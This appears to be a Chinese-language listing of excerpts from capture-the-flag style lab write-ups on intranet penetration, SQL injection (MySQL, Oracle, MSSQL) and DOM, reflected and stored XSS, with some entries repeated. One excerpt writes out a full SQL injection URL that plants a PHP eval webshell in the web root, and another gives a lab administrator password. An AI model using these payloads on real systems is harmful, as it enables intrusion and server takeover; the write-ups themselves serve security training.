【Write Up】内网渗透 - 拿下域控
内网渗透之拿下域控定位域控我们之前已经能拿到10.0.1.4这台主机的权限了,且探测到10.0.1.8这台主机的存活,现在就是继续探测存在于域内的主机,并顺藤摸瓜看看能否找到域控,进而拿下域控。我们先通过开放出来的靶场地址直接rdp远程连上去,进而通过之前抓到了账号密码(administrator/woshifengge1.),登陆10.0.1.8这里先看看这台主机的信息,发现是64位的主机,
【Write Up】内网渗透 - 加入目标网段,抓取管理员密码
SQL注入拿shell进入靶场,利用SQL显错注入使用into outfile或者into dumpfile函数手工写入一句话木马http://afsgr16-b1ferw.aqlab.cn/?id=1 and 1=2 union select 1,'<?php @eval($_REQUEST[cmd])?>' into outfile 'C:/phpStudy/WWW/8.php'
【Write Up】内网渗透 - 拿下域控
内网渗透之拿下域控定位域控我们之前已经能拿到10.0.1.4这台主机的权限了,且探测到10.0.1.8这台主机的存活,现在就是继续探测存在于域内的主机,并顺藤摸瓜看看能否找到域控,进而拿下域控。我们先通过开放出来的靶场地址直接rdp远程连上去,进而通过之前抓到了账号密码(administrator/woshifengge1.),登陆10.0.1.8这里先看看这台主机的信息,发现是64位的主机,
【Write Up】内网渗透 - 加入目标网段,抓取管理员密码
SQL注入拿shell进入靶场,利用SQL显错注入使用into outfile或者into dumpfile函数手工写入一句话木马http://afsgr16-b1ferw.aqlab.cn/?id=1 and 1=2 union select 1,'<?php @eval($_REQUEST[cmd])?>' into outfile 'C:/phpStudy/WWW/8.php'
xeel - DOM XSS靶场
写在前面:首先先介绍下DOM型XSS,其实也属于反射型XSS的一种. 首先我们进入靶场看不出什么名堂来,OK,我们进行开发者模式,审查元素发现一个document对象,在URL上也发现了对应的显示 , 尝试一下在URL上打一个XSSemmm , 可能要进行传参才能显示 ?发现这里需要闭合 , Bingo ! 试一下咯~PS: 发现 这里的xeel需要用('') 才行 ,单独的无论是
xeel - 后端+表单验证作业
HTML 部分<!doctype html><html><head> <meta charset="utf-8"> <title>后端+PHP表单验证作业</title> </head><body>
xeel - 反射型XSS靶场
写在前面:反射型XSS是非持续性攻击 , 只对此次的访问有用 , 一般最经典的XSS语句是 <script>alert(1)<script>作用是进行弹窗--------------------------------进入靶场:鬼畜型靶场 , 就问还有谁 ??!测试是否存在XSS , 就是见缝就插 ~发现没什么作用, 再看框里的语句 , 没
xeel - 存储型Xss靶场
写在前面:------------------------------------------------------------------------我想先引用励志风对于XSS的理解与分析xss类型: 反射型XSS (你提交的数据成功的实现了XSS,但是仅仅是对你这次访问产生了影响,是非持久型攻击) 存储型XSS(你提交的数据成功的实现了XSS,存入了数据库,别人访问这
xeel - Oracle注入- 报错注入
-------------------------------------------------------------------------------------------------------------------------------写在前面: Oracle数据库和mysql , sqlserver , Access数据库不是完全一样 用到的语法
xeel - MSSQL注入 - 反弹注入
首先进入靶场 , 要先明白这个是mssql数据库即 sql server数据库 , 和mysql数据库是有不一样的地方的进入 , 老方法 , 判断是否存在注入 , and 1=1 , 注意这里要用到 -- 来注释语句 , 发现报错 , 在?id=2 后面加个单引号闭合成功输出 , 接下来'and 1=2--页面显错了 , 再来猜字段'and 1=2 orde